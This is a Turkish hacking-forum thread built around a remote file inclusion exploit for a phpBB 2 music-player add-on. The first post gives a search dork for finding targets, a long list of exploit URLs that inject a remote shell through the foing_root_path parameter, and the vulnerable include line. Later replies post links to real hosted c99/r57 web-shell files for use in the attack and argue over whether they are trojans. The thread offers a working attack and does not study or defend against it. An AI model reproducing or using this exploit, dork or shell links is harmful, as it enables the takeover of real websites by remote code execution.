PhpBB 2 Remote File Include

[Devil]

Google Dork:"Powered By PhpBB 2"

Exploit
http://www.vicTim.com/[player]/faq.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/list.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/gen_m3u.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/view_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/login.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/playlist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/set_na.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/initialise.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/flash/get_song.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/includes/common.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/nav.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/main.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/list_artists.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/index.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/genres.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_artist.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/edit_album.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/config.php?foing_root_path=sh3ll.txt?
http://www.vicTim.com/[player]/admin/admin_status.php?foing_root_path=sh3ll.txt?


Vulnerable Code
include('includes/common.php');
$phpbb_root_path = $foing_root_path . $phpbb_root_path;
In
./faq.php
./index.php
./list.php
./login.php
./playlist.php
./song.php
./gen_m3u.php
./view_artist.php
./view_song.php
./flash/set_na.php
./flash/initialise.php
./flash/get_song.php
./includes/common.php
./admin/nav.php
./admin/main.php
./admin/list_artists.php
./admin/index.php
./admin/genres.php
./admin/edit_artist.php
./admin/edit_album.php
./admin/config.php
./admin/admin_status.php

 

[nighthawks]

sh3ll.txt ?

 

[Devil]

http://xxx.com/shell.txt ? c99 r57

 

[nighthawks]

bu ne devil shell.txt nerde?

 

[FreeZe]

way be.phpbb bukadar aptalmı olamaz
teşekkürler iyi açık
shell veriyim ben
http://freez3.by.ru/c99.txt?

Selametle

 

[ılgaz]

freeze nin mesajını tıklamayın sakın trojan kodlarını koymuşşşşşşşşşşşşşş

 

[MySouLNeedLove]

Evet Trojan Var...

 

[imkechenoff]

victim kurban demek zaten.... Trojan kurbanı...

 

[hseyin]

hehehehuehuuheehu

 

[FreeZe]

kardeşlerim yemin ederim o trojansa yarına kalkmak nasip olmasın r57 - c99 türdevli listpatchlerde antilerin ötmesi çok doal hack uygulaması... yemin ederim trojan warsa banlayın.hem .txtde nasıl trojan olabilir?

 

[zetrewxx]

trojan dediginiz shell kodları ne gunlere kaldık

 

[wolkanno]

trojen değil malware )

 

[aksaray23]

yaaa ben tıkladım sonra okudum dedim ki ne trojeni c99 kodları koymus

http://pinokkio8888.altervista.org/sss.txt?&


gibi

 

[FreeZe]

ohh be beni kurtaranlar çıktı thx :

 

[S3hzade]

hıhı ne trojenı muhhah onlar c99 code lerı
demekki r57 gorsen altına ısıcen

 

[exkalibur]

FreeZe sakin ol kardesim bildiklerinden konusmuyorlar ya laf olsun senin mesajin alinmistir eline saglik

 

[baits]

aaah ah bu açıkları ben bulmuştumda deerim bilinmedi :S

 

[cac005]

arkadaslar freeze nin sucu yokki shellerin hepsinde var hackten anlamıyorsanız ne geziyorsunuz burda

 

[GenTlellvl]

S.a Ben YEni Üyeyimde Arkadaslar Bu Kadar Acemimisiniz Yaww.

Ya O Virüs Ama Bilgisayarına Zarar Vermiyor Çökerteceğin Siteye Zarar Veriyor

 

[exkalibur]

ya lamer bunlar ne tojeni bukadar korkuyorsunu hack yapmaya kalkiyorsunuz